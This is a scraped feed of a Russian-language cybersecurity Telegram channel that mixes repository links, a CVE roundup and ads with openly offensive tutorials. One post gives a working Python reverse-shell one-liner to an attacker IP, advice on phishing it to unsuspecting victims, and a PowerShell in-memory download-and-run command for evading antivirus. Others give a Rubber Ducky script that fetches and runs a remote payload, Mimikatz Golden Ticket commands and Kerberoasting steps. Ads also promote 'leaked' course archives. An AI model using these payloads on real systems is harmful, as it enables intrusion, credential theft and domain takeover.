CyberGuard

💻Sickle — Инструментарий для разработки и анализа полезных нагрузок

Sickle — это Payload Development Kit (PDK) для упрощения процесса создания, тестирования и форматирования шеллкодов. Позволяет быстро преобразовывать «сырой» байт-код в различные форматы (C, Python, Perl, Bash и др.), а также включает функции для поиска «плохих» символов и симуляции выполнения кода.

🐱 Ссылка на GitHub CyberGuardе | Вакансии | Чат ||#Репозитории

Firewall vs Antivirus

Брандмауэр защищает сеть, контролируя входящий и исходящий трафик, предотвращая несанкционированный доступ, тогда как антивирус защищает устройство, обнаруживая, предотвращая и удаляя вредоносное ПО из файлов и программ.

CyberGuardе | Вакансии | Чат ||#Шпора

CyberGuardе | Вакансии | Чат ||

🔥 Reverse Shell на Python — удалённый доступ к чужому ПК за 30 секунд Хватит теории. Показываю, как одной строкой кода получить полный контроль над любым компьютером, где есть Python. Обход фаерволов, антивирусов и NAT. Погнали. 🎯 Как это работает: Обычно хакер стучится к жертве (например, по SSH). Но фаерволы блокируют входящие подключения. Reverse shell — наоборот. Жертва сама подключается к хакеру. Исходящие соединения почти никогда не блокируют. Чисто. Архитектура: 1. Хакер запускает слушателя на своём IP: nc -lvnp 4444 2. Жертва (не подозревая) выполняет скрипт. Скрипт подключается к IP хакера на порт 4444. 3. Хакер получает cmd/в оболочку. Всё просто. 🛠 Скрипт жертвы (одна строка, маскируем под что угодно):

import socket,subprocess,os;s=socket.socket();s.connect(("ВАШ_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])

Для Windows: замени /bin/sh на "cmd.exe". Объяснение для новичков: скрипт открывает сокет, подключается к вашему серверу, перенаправляет весь ввод-вывод в сокет и запускает командную строку. Всё, что вы введёте у себя, исполнится на компе жертвы. А результат придёт к вам. 🗣 Как доставить скрипт жертве (реальные способы): 🔴 Фишинг: отправляете файл invoice.py (иконка Excel) с темой "Счёт на оплату". 🔴 USB Rubber Ducky: флешка, которая эмулирует клавиатуру и вводит команду сама. 🔴 Эксплойт браузера: через уязвимость выполняете скрипт прямо в памяти, не сохраняя на диск. 🔴 Через легитимный сайт: если на сайте есть XSS, можно выполнить скрипт через консоль браузера (но это отдельная тема). 🔥 Фишка (обход EDR): Запустите скрипт не как python shell.py, а через доверенный процесс (Living off the Land):

powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://ваш_сервер/shell.py')"

Скрипт не касается диска. Он выполняется в памяти. Многие антивирусы его не видят. CyberGuardе | Вакансии | Чат ||#Статья

💻 АНТИВИРУСЫ И ТЕХНИКИ ОБХОДА: ПОЛНЫЙ ГАЙД ДЛЯ НОВИЧКА

📹 Первоисточник

CyberGuardе | Вакансии | Чат || #Видео

Айтишник, который не умеет использовать командную строку bash – так себе специалист. Если посетить несколько собеседований уровня от миддл, то можно убедиться, что вопросы про опыт работы в консоли появляются довольно часто. Сходу научиться всем командам bash нереально – их очень много. К счастью, появился канал BashMaster, в котором каждый день можно узнавать по одной небольшой связке команд и сразу же внедрять их в свою работу. Подпишись, освоишь bash на изи 👍

🛡 Опасные баги, которые могли дать хакерам полный контроль За последние дни в популярных библиотеках и системах нашли критические уязвимости. Админам и разработчикам — срочно к прочтению. Что случилось:

🟢GStreamer 1.28.2 — три бага с переполнением буфера через обработку MKV, MOV/MP4 и H.266/VVC. Достаточно закинуть файл в ~/Downloads — автоматическая индексация GNOME запустит уязвимый код 🟢CUPS — две критические уязвимости дают выполнение кода от root через некорректно обработанные задания печати 🟢wolfSSL (CVE-2026-5194) — подрыв цифровых подписей ECDSA/DSA/Ed25519. OpenSSL (CVE-2026-31790) — буферы для RSA KEM 🟢OpenClaw 2026.3.11 — любой operator.admin мог стать админом командой /pair approve 🟢Nix (CVE-2026-39860) — перезапись любых файлов через символические ссылки в сборочном окружении 🟢Ядро Linux — баги в nfsd, io_uring, futex и ksmbd позволяют читать память ядра через NFS-запросы (некоторые живут с 2.6.0!)

Почему это важно: Даже проверенные компоненты могут нести критические дыры. Одна библиотека может стоить вашей инфраструктуре очень дорого. Вывод: Обновляйте всё вовремя и следите за CVE. Это не паранойя — это работа. CyberGuardе  | Вакансии | Чат ||#Статья

🔠 Слили 4 ТБ по IT, хакингу и разработке. ⚪️ Все лучшие инструкции, гайды, книги и инструменты — без воды. 🖥 Курсы & GitHub — 579GB ☁️ Хакинг & ИБ — 756GB 🤒 OSINT — 315GB ⌨️ Python — 955GB 🙃 Linux & Bash — 459GB 😦 Работа в IT — 278GB 🖥 Общий архив — 946GB ➡️ Присоединяйтесь и скачивайте. Пост будет удален через 48 часов.

💻 Awesome Bug Bounty Tools — Огромная подборка инструментов для охотников за ошибками

Awesome Bug Bounty Tools — это тщательно отобранный список (curated list) лучших программ, скриптов и ресурсов для проведения Bug Bounty и тестирования на проникновение. — Репозиторий структурирован по категориям: разведка (Recon), поиск поддоменов, сканирование уязвимостей (XSS, SQLi, SSRF), мобильная безопасность, работа с облаками и автоматизация. Это один из самых полных справочников для ИБ-специалистов.

🐱 Ссылка на GitHub CyberGuardе  | Вакансии | Чат ||#Репозитории

😒 Подборка каналов по информационной безопасности Проверенные каналы по безопасности, которые реально помогают расти. 👍 ZeroDay — Уроки, эксплуатация уязвимостей с нуля 👍 Белый Хакер — Свежие новости из мира ИБ 😎 Бункер Хакера — Статьи, книги, шпаргалки и хакинг 👨‍💻 Серверная Админа — Настройка и уроки по компьютерным сетям 📂 Подписывайся

Изучаете кибербезопасность? Хотите стать топовым ИБ-специалистом с высокой ЗП? Пока другие идут в летний отпуск, вы можете стремительно войти в сферу ИБ при помощи сборки "Безопасность в деле" которую мы составили. Что внутри сборки: – Каналы об Offensive Security: Поиск уязвимостей, пентест, и всё о защите от хакерства – Digital Security каналы: защита данных, подсказки для ваших проектов и реальный опыт в отражении атак – OSINT и анонимность: всё по теме поиска информации от А до Я, авторские лайфхаки и простые заметки с расследований – Каналы про ИБ: опытные ИБ-специалисты делятся с вами знаниями и помогают в комментариях Для каждого здесь что-то найдётся! Выберите интересные вам каналы и подпишитесь на сборку. Найдите то, что нужно именно вам для следующего шага в ИБ.

Evilginx3-Phishlets — Коллекция специализированных конфигурационных файлов (фишлетов) для фреймворка Evilginx3

Evilginx3 Phishlets — это библиотека YAML-конфигураций, предназначенных для работы с Evilginx3. Эти инструменты используются специалистами по кибербезопасности (Red Teaming) для проведения атак типа Man-in-the-Middle (MITM) с целью тестирования устойчивости систем к фишингу.

🐱 Ссылка на GitHub CyberGuardе | Вакансии | Чат |#Репозитории

Приветствую наших читателей! 👋 Сегодня разбираем Golden Ticket — атаку, которая даёт хакеру абсолютную власть над Active Directory. Украл один хеш — и ты бог домена. Подписываешь себе любые права, заходишь на любой сервер. Погнали! ⚡️ 🔍 Что такое Golden Ticket? В домене Windows есть специальная учётная запись — krbtgt. Она отвечает за подпись всех билетов Kerberos (TGT). Если хакер украл её NTLM-хеш, он может самостоятельно подписать билет для любого пользователя, включая администратора домена. Этот фальшивый билет называется Golden Ticket. Он позволяет получить доступ к любым ресурсам домена, даже если хакер уже потерял доступ к контроллеру. Что даёт Golden Ticket: 🔴 Доступ к любому серверу в домене. 🔴 Возможность создать себе учётную запись администратора. 🔴 Полный контроль над всей инфраструктурой. 🔴 Персистентность (закрепиться надолго). ⚙️ Как добыть хеш krbtgt? Для создания Golden Ticket нужно: 1. Административный доступ к контроллеру домена (через эксплуатацию, Mimikatz, дамп LSASS). 2. Извлечь NTLM-хеш учётной записи krbtgt (или AES-ключи). В Mimikatz:

lsadump::lsa /patch

Ищем в выводе строку с krbtgt и запоминаем хеш. 🛠 Создание Golden Ticket (Mimikatz)

kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:хеш_krbtgt /id:500 /ptt

- /user — имя пользователя, от которого подписываем билет. - /domain — FQDN домена. - /sid — SID домена (можно получить командой whoami /user на любой машине домена). - /krbtgt — хеш учётки krbtgt. - /id:500 — RID администратора домена. - /ptt — внедрить билет в текущую сессию (Pass The Ticket). После этого открывается доступ к \\controler.domain.local\C$ и другим ресурсам. 👺 Реальная фишка — персистентность даже после смены пароля Если хакер создал Golden Ticket, а потом администратор сменил пароли всех пользователей и сервисов, хакер всё равно сохранит доступ. Пока не будет дважды сменён пароль krbtgt (и подождано время репликации), старые билеты остаются валидными. Как выгнать хакера: 1. Сменить пароль krbtgt первый раз. 2. Подождать репликацию (часы). 3. Сменить пароль krbtgt второй раз. 4. Перезагрузить все системы. 🛡 Защита от Golden Ticket

🔴 Регулярно менять пароль krbtgt (каждые 6–12 месяцев) — дважды. 🔴 Ограничить доступ к контроллеру домена (админы должны работать с выделенных рабочих станций, а не с серверов). 🔴 Включить мониторинг аномалий Kerberos (необычные TGT, нестандартные сроки жизни билетов). 🔴 Использовать защищённые административные узлы (PAW). 🔴 Внедрить LAPS для уникальных локальных паролей на серверах.

Запомни: Golden Ticket — это элитная атака на Active Directory. Только лабораторное использование. Без разрешения — уголовка. 🧬 Итог Golden Ticket — одна из самых опасных атак на Windows-домены. Украсть хеш krbtgt сложно, но если это случилось, хакер становится неуловимым. Администраторы, меняйте krbtgt дважды и мониторьте Kerberos. 🔥 Если тема зашла — газуй реакциями! 🔥 CyberGuardе | Вакансии | Чат || #Статья

АНБОКСИНГ МИНИ-ПК ЗА 750$: ПОШАГОВАЯ УСТАНОВКА UBUNTU SERVER С ФЛЕШКИ ДЛЯ ИБ-ЛАБОРАТОРИИ

📹 Первоисточник

CyberGuardе | Вакансии | Чат || #Видео

Айтишники ловите сборник бесплатных курсов, полезных инструментов и книг Проект «TERMINAL» стал крупнейшей библиотекой бесплатного образования. В одном канале собраны курсы, книги, полезные инструменты и практические тренажёры для всех разработчиков 🎓 Практические курсы и задания 🪽 Книги и статьи известных авторов 😮‍💨 Полезные инструменты и ресурсы 🌟 IT-новости и инсайды Обучение по всем направлениям: SQL, Python, Frontend, PHP, C++, Golang, GIT, Linux, QA, Java, кибербезопасность и др. Ценишь знания, подпишись: Terminal_tg

🔥 Крадём NTLM-хеши через USB-флешку за 5 секунд Хватит теории. Показываю, как обычная флешка роняет домен. 🎯 Атака: BadUSB + Responder Берёшь USB Rubber Ducky (или любую флешку с Arduino). Записываешь скрипт:

DELAY 1000
GUI r
DELAY 200
STRING cmd /k powershell -c "Invoke-WebRequest -Uri http://ваш_сервер/evil.ps1 -OutFile $env:tmp\payload.ps1; powershell -exec bypass $env:tmp\payload.ps1"
ENTER

На своём сервере запускаешь:

responder -I eth0 -rdwv

Жертва втыкает флешку — за 5 секунд: 1. Скрипт дёргает ваш сервер. 2. Responder ловит NTLM-хеш учётки, под которой работает пользователь (часто админ). 3. Хеш брутишь через hashcat за пару минут. 4. Заходишь на любой сервер в домене под админом. 🗣 Реальный кейс:

На пентесте одной нефтяной компании мы оставили несколько таких флешек в вестибюле. Через час — полный захват домена. Сотрудники сами подключили "забытые" флешки.

➡️ Как защититься: 🔴 Отключить автозапуск USB через GPO. 🔴 Не втыкать найденные флешки. 🔴 Включить extended protection для NTLM. CyberGuardе  | Вакансии | Чат ||#Статья

💻 Kerberoasting — охота на сервисные аккаунты, которая убивает Active Directory Октябрь 2022 — август 2024. Атака Kerberoasting существует уже больше десяти лет, но до сих пор остаётся одной из самых недооценённых угроз для доменов Microsoft. Хакер с правами обычного пользователя запрашивает сервисные билеты (TGS) у KDC, вытаскивает из них хеш сервисной учётки, зашифрованный устаревшим протоколом RC4, и взламывает пароль офлайн, подбирая его на полной мощности своего GPU. 🎯 Что произошло: 1. Административная ошибка как норма — в Active Directory сервисные аккаунты (SQL, IIS, Exchange и др.) регистрируют специальные Service Principal Names (SPN). По правилам безопасности их пароли должны быть длиной 25+ символов и случайными. Но на практике их часто создают такие же, как у людей — короткие и осмысленные, а меняют раз в год, если вообще меняют. 2. Пентестерский «Сникерс» — любой аутентифицированный пользователь домена, даже без прав администратора, может выполнить запрос к контроллеру домена (KDC) за TGS-билетом для найденного SPN. «GetUserSPNs.py -request -dc-ip 10.10.10.26 TESTDOMAIN.local/testuser1:Testuser! > kerberoast.txt» — этой команды достаточно, чтобы забрать хеш к себе. 3. Офлайн-расстрел в хешкате — после получения хеша атакующий спокойно уходит со взломанной машины и запускает перебор уже на своём мощном оборудовании: «hashcat -m 13100 kerberoasting.txt rockyou2021.txt -r rules\InsidePro-HashManager.rule -O –force -w 3». Система безопасности эту часть атаки уже не увидит — в отличие от логов контроллера домена, где остаётся лишь событие ID 4769 (запрос билета), легко теряющееся в общем потоке. 4. Эскалация до Domain Admin — взломав пароль сервисного аккаунта, злоумышленники получают контроль над всей инфраструктурой (например, право на делегирование) и движутся дальше вглубь сети. 🔍 Почему это катастрофа:

🟢 Древность протокола RC4 — сервисные билеты до сих пор шифруются с помощью устаревшего алгоритма RC4, который делает возможным перебор пароля офлайн. Microsoft не спешит его отключать ради совместимости с древним софтом, и десятилетняя проблема остаётся открытой. 🟢 Широкие возможности даже у обычного пользователя — Kerberoasting не требует прав администратора. Запрос TGS для любого SPN в домене может выполнить любой аутентифицированный пользователь. Если злоумышленник уже внутри сети (после фишинга или через взломанную учётку), у него есть прямой путь к эскалации. 🟢 Атака вне поля зрения SOC — запрос сервисных билетов — штатная операция Kerberos, происходящая тысячами раз в день. Злоумышленнику достаточно сделать всего один корректный запрос, забрать TGS-REP, а тяжёлый перебор хеша проводить уже на своём компьютере, вдали от сетевых датчиков. 🟢 Сервисные аккаунты — идеальная цель — они часто имеют права локального администратора на серверах, а их пароли меняются редко. Взлом одной сервисной учётки может привести к компрометации десятков критически важных систем.

🗣 Реальный кейс: В мае 2024 года некоммерческая больничная система Ascension Health подверглась массированной атаке с использованием вымогателя. Тихий сотрудник компании перешёл по вредоносной ссылке — стала цепная реакция взломов по всей сети. Позднее специалисты выяснили: хакеры добрались до серверов, применив атаку Kerberoasting. Уязвимость была названа Microsoft "low tech, high-impact": её эксплуатировали естественным поведением протокола и слабым паролем учётной записи сервера. Впоследствии их метод исследования повторил сенатор США Рон Уайден, обратившись в Федеральную комиссию по торговле с требованием разобраться в сложившейся ситуации. Одной слабой ссылки и одного устаревшего сервисного пароля хватило для паралича сетей крупной медицинской сети. ➡️ Полный разбор можно найти тут CyberGuardе | Вакансии | Чат ||# #Статья

⚠️ Внимание: Опубликована слитая недавно База из 1000+ топовых курсов и материалов для айтишников Отсортировали их для вашего удобства и выложили в телеграм-каналы по категориям: 🤖 Нейросети – 855+ материалов 🖥 Python — 1558+ материалов 👩‍💻 Frontend — 1241+ материалов 👩‍💻 Backend — 1095+ материалов ⚙️ Программы — 978+ материалов 📚 Книги по IT — 779+ материалов ⌛️ Ссылки будут активны 48 часов, сохрани себе, чтобы не потерять!

💻 SSLyze — быстрая и мощная библиотека для сканирования SSL/TLS на сервере

SSLyze — это библиотека на Python и инструмент командной строки, который может анализировать SSL настройку сервера подключаясь к нему. Он предназначен быть быстрым и всеобъемлющим и должен помочь организациям и тестерам выявить неправильные настройки влияющие на SSL/TLS серверов

🐱 Ссылка на GitHub CyberGuardе | Вакансии | Чат ||#Репозитории